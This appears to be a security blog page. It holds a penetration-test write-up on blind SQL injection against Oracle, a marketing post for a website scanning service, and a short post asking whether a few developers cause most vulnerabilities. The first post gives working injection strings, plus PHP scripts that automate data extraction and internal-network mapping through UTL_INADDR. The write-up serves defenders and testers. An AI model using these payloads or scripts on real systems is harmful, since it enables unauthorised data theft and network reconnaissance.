
In Your Oracle: Part Two

In Micheal's previous post, 'In Your Oracle: The Beginning', he introduced a blind SQL Injection vulnerability that a client had asked us to dig deeper into. The client wanted us to do this because, while they recognized that the vulnerability was real, actionable, and a threat – especially to their users – they weren't convinced of its severity. Instead, the client claimed that the vulnerability could only be leveraged to read data already intended to be accessible to the logged-in user. In other words, the SQL query was executing within the context of a low-privileged database user.

A quick aside: a different client of mine recently downplayed the severity of an SQL Injection vulnerability because the result set was being parsed and formatted before being incorporated into the response. Because of this behavior, they didn't think any data could be accessed other than what was intended to be parsed and formatted into the page. Beyond pointing out that an attacker could UNION other data into the result set, or simply brute force dropping tables, I introduced the client to something Micheal touched on in his post: the true/false/error condition. More on this in a minute.


The Vulnerability

The vulnerability that Micheal and I were digging into did not involve the entire result set being output to the page, so we couldn’t simply UNION other data and get it all dumped back to us. That’s because the application would execute an SQL query – using an ID that was being supplied in the query string – and the first row of data returned by the query would be used to determine the response. Therefore, we could only return a limited amount of data at a time, and that data would have to conform to certain data types – otherwise, the page would error out.

Here’s an example of what the back-end SQL query may have looked like (though, in reality, it was much more complex than this):

SELECT * FROM listingsData WHERE id='504'

And an example of the URL we were injecting on:

http://example.com/somepage?id=504

And last, but not least, an extraordinarily simplified example of the output from the page:

Listing ID: 504
Listing Entity: Acme, Inc.
Listing Data: <a table of data>


The True/False/Error Condition

When an SQL Injection vulnerability can’t be leveraged to just dump rows upon rows of data, a true/false condition can allow an attacker to fuzz the database, and determine the table and column names, the cell values, and more. Basically, with a reliable true/false condition, an attacker can brute force the entire database in a practical amount of time.

However, due to strange behavior from the application (plus what we suspected was a complex query syntax that we couldn’t discern), we were not able to simply append our own WHERE clause condition, like this:

http://example.com/somepage?id=504'%20AND%201=1%20AND%20''='

We were, however, able to perform string concatenation. Injecting id=5'||'0'||'4 would give us the same response as id=504. We also discovered that id=54 would result in the following response:

Listing ID:
Listing Entity:
Listing Data:

Furthermore, we found that a syntax error, such as what id=' would cause, produced the following response:

An error has occurred. Please try again.

In Oracle, there exists a dummy table called 'dual'. We were able to use this table, in combination with string concatenation and a sub-query, to establish a boolean condition:

http://example.com/somepage?id=5'||(SELECT%200%20FROM%20dual%20WHERE%201=1)||'4

The URL encoding makes it look messy. Here’s the URL-decoded version of our injection:

5'||(SELECT 0 FROM dual WHERE 1=1)||'4

Because the WHERE clause of our sub-query evaluated to TRUE, the SELECT would return a zero, which got concatenated with the 5 and 4, and became 504. This injection resulted in Acme, Inc.’s information being returned in the page, and became our TRUE condition.

Now consider this injection (URL decoded for readability):

5'||(SELECT 0 FROM dual WHERE 1=0)||'4

Because the WHERE clause evaluated to FALSE, the SELECT returned nothing, which got concatenated with 5 and 4, and became 54. This injection resulted in blank listing data in the response, and was considered to be our FALSE condition.

The TRUE condition let us know when the WHERE clause of our sub-query evaluated to TRUE, and the FALSE condition told us the inverse. The error condition (described a few paragraphs above) let us know if there was a syntax error in our query (possibly due to characters being unexpectedly encoded).
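
To make the mechanics concrete, here's a minimal sketch, in PHP (the language we'd later automate all of this in), of how the three conditions can be wrapped into a single oracle function. The URL, the response markers, and the askOracle() name are our own illustrative stand-ins, not the client's actual application:

<?php
// Hypothetical wrapper around the true/false/error condition. The URL
// and response markers below are illustrative; the real application
// and its responses were more complex.
function askOracle(string $subquery): string {
    $payload = rawurlencode("5'||({$subquery})||'4");
    $body = @file_get_contents("http://example.com/somepage?id={$payload}");
    if ($body === false || strpos($body, 'An error has occurred') !== false) {
        return 'ERROR';  // syntax problem, or characters got mangled
    }
    if (strpos($body, 'Acme, Inc.') !== false) {
        return 'TRUE';   // sub-query returned 0, so the id became 504
    }
    return 'FALSE';      // sub-query returned no rows, so the id became 54
}

// Sanity checks against the two known conditions:
var_dump(askOracle("SELECT 0 FROM dual WHERE 1=1")); // string(4) "TRUE"
var_dump(askOracle("SELECT 0 FROM dual WHERE 1=0")); // string(5) "FALSE"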

Now that we had established a reliable true/false/error condition, we could start having some fun.


The Good Stuff

We were able to use the true/false condition to brute force some pieces of information that we figured the client did not intend logged-in users to obtain, such as the database name (from this point forward, all injections will remain URL-decoded for the sake of readability):

5'||(SELECT 0 FROM dual WHERE SUBSTR(SYS.DATABASE_NAME, 1, 1) BETWEEN 'a' AND 'z')||'4

The above injection took the first character of the database name and determined whether it was a lowercase letter. If true, we'd get Acme, Inc.'s data in the response; if false, we'd get blank listing data.

We could quickly brute force each character by cutting our BETWEEN range in half for each test. For example, if the above injection resulted in a TRUE condition, then we could figure out which lowercase letter the database name started with by using the following process:

Cut the range of characters in half:

5'||(SELECT 0 FROM dual WHERE SUBSTR(SYS.DATABASE_NAME, 1, 1) BETWEEN 'a' AND 'm')||'4

If the above resulted in a TRUE condition, then we knew the letter was between 'a' and 'm', and could then test for it being between 'a' and 'g'. If the above resulted in a FALSE condition, then we'd drill down into the 'n' through 'z' range. In either case, we kept narrowing the search range until we were able to pinpoint the correct character.

We could then brute force the rest of the database name characters by incrementing the second parameter of the SUBSTR function (2 for the second character, 3 for the third, etc). If we incremented the parameter and got an error condition as a result, we knew we had surpassed the length of the database name.
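
Here's a rough sketch of that halving process as code, reusing the hypothetical askOracle() helper from the earlier snippet. The a-z range mirrors the example above; a real run would also probe digits, uppercase letters, and punctuation:

// Per-character binary search over the database name.
function extractChar(int $pos): ?string {
    $lo = ord('a');
    $hi = ord('z');
    $range = function (int $a, int $b) use ($pos): string {
        return "SELECT 0 FROM dual WHERE SUBSTR(SYS.DATABASE_NAME, {$pos}, 1) "
             . "BETWEEN '" . chr($a) . "' AND '" . chr($b) . "'";
    };
    if (askOracle($range($lo, $hi)) !== 'TRUE') {
        return null; // not a lowercase letter: past the end, or another character class
    }
    while ($lo < $hi) {
        $mid = intdiv($lo + $hi, 2);
        if (askOracle($range($lo, $mid)) === 'TRUE') {
            $hi = $mid;     // character is in the lower half
        } else {
            $lo = $mid + 1; // character is in the upper half
        }
    }
    return chr($lo);
}

$name = '';
for ($pos = 1; ($c = extractChar($pos)) !== null; $pos++) {
    $name .= $c;
}
echo "Database name so far: {$name}\n";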

We could also pre-determine the length of the database name using a similar "test and drill down" technique, starting with this injection:

5'||(SELECT 0 FROM dual WHERE LENGTH(SYS.DATABASE_NAME)>10)||'4
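
The same halving loop works on numbers, too. Here's a short sketch of the length search, again built on the hypothetical askOracle() helper, with the 1-to-64 bounds being our own assumption:

// Binary search the name's length; 1..64 bounds are assumed.
$lo = 1;
$hi = 64;
while ($lo < $hi) {
    $mid = intdiv($lo + $hi, 2);
    // TRUE means the length is greater than $mid, so search above it.
    $q = "SELECT 0 FROM dual WHERE LENGTH(SYS.DATABASE_NAME)>{$mid}";
    if (askOracle($q) === 'TRUE') {
        $lo = $mid + 1;
    } else {
        $hi = $mid;
    }
}
echo "Database name length: {$lo}\n";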

Once we had brute forced the entire value, we verified our finding with this injection:

5'||(SELECT 0 FROM dual WHERE SYS.DATABASE_NAME='dbmaster01')||'4

We were able to extract information from other tables, too, such as:

5'||(SELECT 0 FROM SYS.USER_USERS WHERE SUBSTR(username, 1, 1) BETWEEN 'a' AND 'z')||'4

Using this method, we were able to extract various pieces of information, such as the database name, the database user the query was executing as, the database user ID, and the default tablespace. However, Micheal and I weren't content to stop there. With the help of pentestmonkey.net, we discovered some interesting Oracle features that gave us some juicy insights into our client's network.


The Juicy Stuff

Oracle has a couple of functions that allowed us to extract the server's internal hostname and IP address: UTL_INADDR.get_host_name and UTL_INADDR.get_host_address, respectively. Using the same brute force technique described above, we were able to extract the hostname and IP, then verify our findings with the following injections:

5'||(SELECT 0 FROM dual WHERE UTL_INADDR.get_host_name='srvdb01')||'4
5'||(SELECT 0 FROM dual WHERE UTL_INADDR.get_host_address='10.1.20.5')||'4

What we found even more interesting was that UTL_INADDR.get_host_name would accept a parameter – an IP address – allowing us to effectively perform reverse DNS lookups through the SQL Injection vulnerability:

5'||(SELECT 0 FROM dual WHERE LENGTH(UTL_INADDR.get_host_name('10.1.20.6'))>0)||'4

If the above resulted in a TRUE condition, we knew the IP resolved successfully, and we could proceed with brute forcing the hostname. If the result was a FALSE condition, we’d presume the IP to be invalid.

Micheal and I, being the PHP fans that we are, collaborated to automate the entire process. Several hundred lines of code later, we were able to quickly harvest dozens of internal IPs and corresponding hostnames – information that would come in quite handy for a network-level attack, or even for a social engineering approach ("Hi, I'm Matt from IT. I'm having trouble logging in to srvdb01 at 10.1.20.5. Is the root password still 'qSSQ[W2&(8#-/IQ4b{W;%us'?").
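
For a flavor of what that automation might have looked like, here's a heavily condensed sketch of just the subnet-sweep portion, once more leaning on the hypothetical askOracle() helper from the first snippet (the 10.1.20.0/24 range is illustrative):

// Sweep a /24 for IPs that resolve via the database's DNS.
$liveHosts = [];
for ($octet = 1; $octet <= 254; $octet++) {
    $ip = "10.1.20.{$octet}";
    $q  = "SELECT 0 FROM dual WHERE LENGTH(UTL_INADDR.get_host_name('{$ip}'))>0";
    if (askOracle($q) === 'TRUE') {
        $liveHosts[] = $ip; // reverse lookup succeeded; brute force its hostname next
    }
}
print_r($liveHosts);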


Conclusion & Take-Aways

Never assume that you know the full extent of the threat that a vulnerability represents to your organization. While you can reach a particular level of confidence in your knowledge and understanding of the situation, you never know what new and imaginative avenues of attack or combinations of techniques an attacker may discover or create – like mapping out your internal network through an SQL Injection vulnerability.

"Imagination is more important than knowledge. For knowledge is limited to all we now know and understand, while imagination embraces the entire world, and all there ever will be to know and understand." -Albert Einstein

Our Process — How We Do What We Do and Why

A while back I published what became an extremely popular post looking behind the scenes at WhiteHat Sentinel's backend infrastructure. On display were massive database storage clusters, high-end virtualization chassis, super-fast Ethernet backplanes, fat pipes to the Internet, near-complete system redundancy, round-the-clock physical security, and so on. Seriously cool stuff that, at the time, supported the 2,000 websites under WhiteHat Sentinel subscription, on which we performed weekly vulnerability assessments.

Today, only seven months later, that number has nearly doubled to 4,000 – a level of success we're very proud of. I guess we're doing something right, because no one else, consultancy or SaaS provider, comes anywhere close. This is not said to brag or show off, but to underscore that scalability is a critical part of solving the Web security challenges many companies face, and an area we focus on daily at WhiteHat.

To meet the demand, we scaled up basically everything. Sentinel now peaks at over 800 concurrent scans and sends roughly 300 million HTTP requests per month, a subset of which are the 3.85 million security checks sent each week. Those checks surface around 185 thousand potential vulnerabilities per day that our Threat Research Center (TRC) processes (Verified, False-Positives, and Duplicates), and collectively the system generates 6 TB of data per week. This system of epic proportions has taken millions in R&D and years of effort by many of the top minds in Web security to build.


Clearly, Sentinel is not some off-the-shelf toy of a commercial desktop scanner. Nor is it a consultant body shop hiding behind a curtain. Sentinel is a true enterprise-class vulnerability assessment platform, leveraging a vast knowledge base of Web security intelligence.

This is important because a large number of corporations have hundreds, even thousands, of websites each, and all of them need to be protected. Achieving the aforementioned figures without sacrificing assessment quality requires not only seriously advanced automation technology, but also the development of a completely new process for performing website vulnerability assessments. As a security pro and vendor who values transparency, I believe this process – our secret sauce, something radically different from anything else out there – deserves to be better explained.

As a basis for comparison, the typical one-off consultant assessment/pen-test is conducted by a single person using an ad hoc methodology, with one vulnerability scan, one website at a time. Generally, high-end consultants are capable of thoroughly assessing roughly twenty websites in a year, each a single time. An annual ratio of 20:1 (assessments to people).

To start off, our highly acclaimed and fast-growing Threat Research Center is the department responsible for service delivery. At over 40 people strong, the entire team is located at WhiteHat headquarters in Santa Clara, California. All daily TRC workload is coordinated via a special software-based workflow management system, named "Console," that we purpose-built to shuttle the millions of discrete tasks that need to be completed across hundreds or thousands of websites.

Work units include initial scan set-ups, configuring the ideal assessment schedule, URL rule creation, form training, security check customization, business logic flaw testing, vulnerability verification, findings review meetings, customer support, etc. Each work unit can be handled, at the appropriate stage of the assessment process, by any available TRC expert – or team of experts – who specializes in that particular area of Web security. Once everything is finished, every follow-on assessment becomes automated.

That is the real paradigm buster: a technology-driven website vulnerability assessment process capable of overcoming the arcane one-person-one-assessment-at-a-time model that stifles scalability. It's as if the efficiency of Henry Ford's assembly line met the speed of a NASCAR pit crew. This model dramatically decreases the man-hours necessary per assessment, leverages the available skills of the TRC, and delivers consistently over time. No other technology can do this.

As a long-time Web security pro, I find such a symphony of innovation coming together to be a real sight to behold. And if there is any question about quality, we expect Sentinel PE testing coverage to meet or exceed that of any consultancy anywhere in the world. That is, no vulnerability that exposes the website or its users to a real risk of compromise should be missed.

Let's get down to brass tacks. If all tasks were combined, a single member of the TRC could effectively perform ongoing vulnerability assessments on 100 websites a year. At 100:1, Sentinel PE is 5x more efficient than the traditional consulting model. Certainly impressive, but this is an apples-to-oranges comparison. The "100" in the 100:1 ratio counts websites, NOT assessments like the earlier-cited 20:1 consultant ratio. The vast majority of Sentinel customer websites receive weekly assessments, not annual one-offs, so the more accurate calculation would be 5200:1 (100 websites x 52 weeks). Sentinel also comes in varied flavors of coverage: SE and BE measure in at 220:1 and 400:1 websites to TRC members, respectively.

The customer experience perspective

Whenever a new customer website is added to WhiteHat Sentinel, a series of assessment tasks is generated by the system and automatically delegated via "Console," our proprietary backend workflow management system. Each task is picked up and completed either by a scanner technology component or by a member of our Threat Research Center (TRC), our team of Web security experts responsible for all service delivery.

Scanner tasks include logging in to acquire session cookies, site crawling, locating forms that need valid data, customizing attack injections, vulnerability identification, etc. Tasks requiring some amount of hands-on work include scan tuning, vulnerability verification, custom test creation, filling out forms with valid data, business logic testing, etc. After every task has been completed and instrumented into Sentinel, a comprehensive assessment can be performed each week in a fully automated fashion, or at whatever frequency the customer prefers. No additional manual labor is necessary unless a particular website change is flagged for attention by someone in the TRC.

This entire collection of tasks, all of which must be completed when a new website is added to Sentinel, is a process we call "on-boarding." From start to finish, the full upfront on-boarding process normally takes 1 to 3 weeks and 2 to 3 scans.

From there, some people in the TRC are dedicated purely to monitoring the hundreds of running scans and troubleshooting anything that looks out of place on an ongoing basis. Another team is tasked simply with verifying the hundreds of thousands of potential scanner-flagged vulnerabilities each week, such as Cross-Site Scripting, SQL Injection, Information Leakage, and dozens of others. Verified results, also known as false-positive removal, are one of the things our customers say they like best about Sentinel, because they mean many thousands of findings customers didn't have to waste their time on.

Yet another team's job is to configure forms with valid data and to mark which are safe for testing. All this division of labor frees up time for those who are proficient in business logic flaw testing, allowing them to focus on issues such as Insufficient Authentication, Insufficient Authorization, Abuse of Functionality, and so on. Contrast everything you've read so far with a consultant engagement that amounts to a Word or PDF report.

At this point you may be wondering whether website size and client-side technology complexity cause us any headaches. The answer is: not so much anymore. Over the last seven years we've seen, and had to adapt to, just about every crazy, confusing, and just plain silly website technology implementation the Web has to offer – of which there are painfully many. Then, of course, we've had to add support for Flash, Ajax, Silverlight, JavaScript, Applets, ActiveX, (broken) HTML(5), CAPTCHAs, etc.

The three most important points here are:

1) Sentinel has been successfully deployed on about 99% of websites we've seen.
2) Multi-million page sites are handled regularly without much fanfare.
3) Most boutique consultancies assess maybe a few dozen websites each year. We call this Monday through Friday.

Any questions?

Are 20% of Developers Responsible for 80% of the Vulnerabilities?

That's the question I recently posed in a Twitter exchange with @securityninja and @manicode. For those unfamiliar with it, the Pareto principle, also known as the 80/20 rule, says that roughly 80% of the effects come from 20% of the causes. This phenomenon can be seen in economics, agriculture, land ownership, and so on. I think it may also apply to developers and software security – particularly software vulnerabilities.

Personal experience would have most of us agreeing that not all developers are equally productive. We've all seen a few developers generate way more useful code in a given amount of time than others. If that's the case, then it may stand to reason that the opposite is also true – that a few developers are responsible for the bulk of the shoddy, vulnerable code. Think about it: when vulnerabilities are introduced, are they fairly evenly attributable across the developer population, or clumped together within a smaller group?

The answer, backed up by data, would have a profound effect on general software security guidance. It would help us more efficiently allocate security resources across developer training, standardized framework controls, software testing, personnel retention, etc. Unfortunately, very few people in the industry have the data to answer this question authoritatively, and even then only from within their own organization. Off the top of my head, I can only think that Adobe, Google, or Microsoft might have such data handy, but they've never published or discussed it.

In the meantime I think we’d all benefit from hearing some personal anecdotes. From your experience, are 20% of developers responsible for 80% of the vulnerabilities?